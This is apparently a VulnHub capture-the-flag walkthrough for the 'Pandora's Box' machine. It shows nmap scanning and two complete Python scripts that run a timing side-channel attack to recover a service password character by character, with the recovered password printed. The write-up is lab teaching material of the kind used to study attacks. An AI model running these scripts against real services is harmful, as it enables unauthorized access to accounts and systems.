In this tutorial, we will learn how to solve Pandora’s box in vulnhub. I chose this box because this box has timing attack exploitation. First of all, we will start with finding machine ip on the network
Finding Machine In The Network
nmap -sn | grep 'report' | awk {'print $5'}
After the scanning I found target ip
(this may be different for you)
Scanning the Ports of Machine
nmap -Pn -p- Starting Nmap 7.70 ( ) at 2019-03-31 12:59 EDT Nmap scan report for Host is up (0.00018s latency). Not shown: 65533 closed ports PORT STATE SERVICE 22/tcp open ssh 54311/tcp open unknown
After scanning the ports of target we can see weird port. That is 54311. Let’s try to connect to 54311. port.

I tried a lot of attack vectors for bypass there (Buffer Overflow, Format String Exploitation, Brute Forcing). Then I noticed this could be Timing attack. Briefly, a timing attack is: It requests a password and it keeps on requesting if the password is incorrect. This effects to response time. So we can develop an exploit for finding the password. Firstly I developed a script like bottom.
#!/usr/bin/python import socket import time import sys host = "" port = 54311 chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((host, port)) def getDuration(sentStr): t = time.time() while True: infoRecv = s.recv(1024) if 'Password:' in infoRecv: dur = time.time() - t s.send(sentStr) t = time.time() break return dur prevChar = '' for c in chars: duration = getDuration(c) sys.stdout.write('Character: '+prevChar+' Duration: '+str(duration)+'\n') #print tried char and response duration prevChar = c s.close()
python Character: Duration: 0.00129508972168 Character: A Duration: 0.0505800247192 Character: B Duration: 0.0528399944305 Character: C Duration: 0.0509960651398 Character: D Duration: 0.0476508140564 Character: E Duration: 0.0474419593811 Character: F Duration: 0.0485258102417 Character: G Duration: 0.0475840568542 Character: H Duration: 0.0476741790771 Character: I Duration: 0.00556206703186 Character: J Duration: 0.00569796562195 Character: K Duration: 0.00564503669739 Character: L Duration: 0.00571393966675 Character: M Duration: 0.00557994842529 Character: N Duration: 0.0057430267334 Character: O Duration: 0.00632500648499 Character: P Duration: 0.00612592697144 Character: Q Duration: 0.00559282302856 Character: R Duration: 0.000180959701538 Character: S Duration: 0.00544595718384 Character: T Duration: 0.00569605827332
I noticed R
Character duration. That was different from others. So our first char was R. Now we have to develop new script and find other chars automatically.
#!/usr/bin/python import socket import time import sys server="" dstPort=54311 chars = "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789" myString = "" s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) connect = s.connect((server, dstPort)) def returnDuration(myStr, sentStr): p = time.time() while True: infoRecv = s.recv(1024) if 'Password:' in infoRecv: dur = time.time() - p theString = myStr + sentStr s.send(theString) p = time.time() break return dur prevChar = '' avgDuration = 0 totDuration = 0 counter = 1 while True: for c in chars: duration = returnDuration(myString, c) if (duration < (avgDuration - 0.002)): sys.stdout.write('Character: '+myString+prevChar+' Duration: '+str(duration)+'\n') sys.stdout.flush() myString += prevChar break totDuration += duration avgDuration = totDuration / counter prevChar = c counter += 1 s.close()
Character: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04 Duration: 0.000775098800659 Character: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04r Duration: 0.000690937042236 Character: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG Duration: 0.000648021697998 Character: R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0 Duration: 0.000640153884888 Password is : R3sp3ctY04r4dm1niSt4t0rL1keYo4R3spectY04rG0d

Yay, we got shell for level1 user. in other writeup we will try to get level2 user. Thanks for reading 🙂
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